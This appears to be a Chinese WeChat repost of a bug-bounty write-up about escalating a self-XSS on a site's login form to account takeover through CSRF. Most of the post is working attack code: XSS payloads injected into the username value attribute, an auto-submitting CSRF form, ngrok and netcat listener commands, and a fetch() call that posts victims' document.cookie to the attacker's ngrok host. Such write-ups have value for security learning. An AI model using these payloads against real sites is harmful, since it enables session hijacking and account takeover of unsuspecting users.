|
|
来源:Medium,作者:@Mostafa Elguerdawi
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
比方说:https: //reacted.com,当我在这个网站上进行测试时,有一个登录功能,像往常一样,我尝试使用响应操作、默认凭据和 SQL 注入来绕过登录。
但没有任何作用,我决定检查源代码,发现我刚才输入的用户名打印在 value 属性中。
我想过尝试XSS注入,所以我尝试在用户名中注入双引号(“),我发现没有对其进行过滤。
所以,我考虑注入'<',这也可能有效。
确实,它起作用了!
因此,我尝试注入一个完整的有效载荷:
"> <svg/onload=alert("XSS")>而且还成功了!
不幸的是,这是一个Self XSS
升级阶段
我运行了 BurpSuite 并在登录期间拦截了该请求。
从请求中,我注意到没有针对 CSRF 的保护,而这是登录功能所期望的。
我尝试使用 CSRF 将 Self XSS 升级为反射 XSS。
使用的有效负载:
<html><body><form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate"><input type="hidden" name="loginName" value="" ><svg/onmouseover=alert(1) "><input type="hidden" name="loginPassword" value="test"/><input name="loginForm" class="btn btn-success" type="submit" value="Log in"/></form><script>document.addEventListener('DOMContentLoaded', function(event) {document.createElement('form').submit.call(document.getElementById('myForm'));});</script></body><html>
是的,它起作用了!
在ngrok的帮助下,我成功获取了任何人的cookie
我打开了两个终端选项卡,第一个:
ngrok http 80
sudo nc -nlvp 80
" > <script>
fetch(‘https://<ngrok-Domain>', { method: ‘POST’, mode: ‘no-cors’, body:document.cookie });
</script> "此有效负载检索用户的 cookie 并将其发送给我,在netcat(nc)的帮助下,我可以获得这些cookie。
最终有效负载:
<html><body><form name='myForm' id='myForm' method="POST" action="https://reacted.com/authenticate"><input type="hidden" name="loginName" value="" > <script>
fetch('https://<ngrok-host>', { method: 'POST', mode: 'no-cors', body:document.cookie });
</script> ""/><input type="hidden" name="loginPassword" value="test"/><input name="loginForm" class="btn btn-success" type="submit" value="Log in"/></form><script>document.addEventListener('DOMContentLoaded', function(event) {document.createElement('form').submit.call(document.getElementById('myForm'));});</script></body><html>
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
信 安 考 证
|
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001... |
推 荐 阅 读
原文始发于微信公众号(潇湘信安):从Self XSS到账户接管(ATO)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论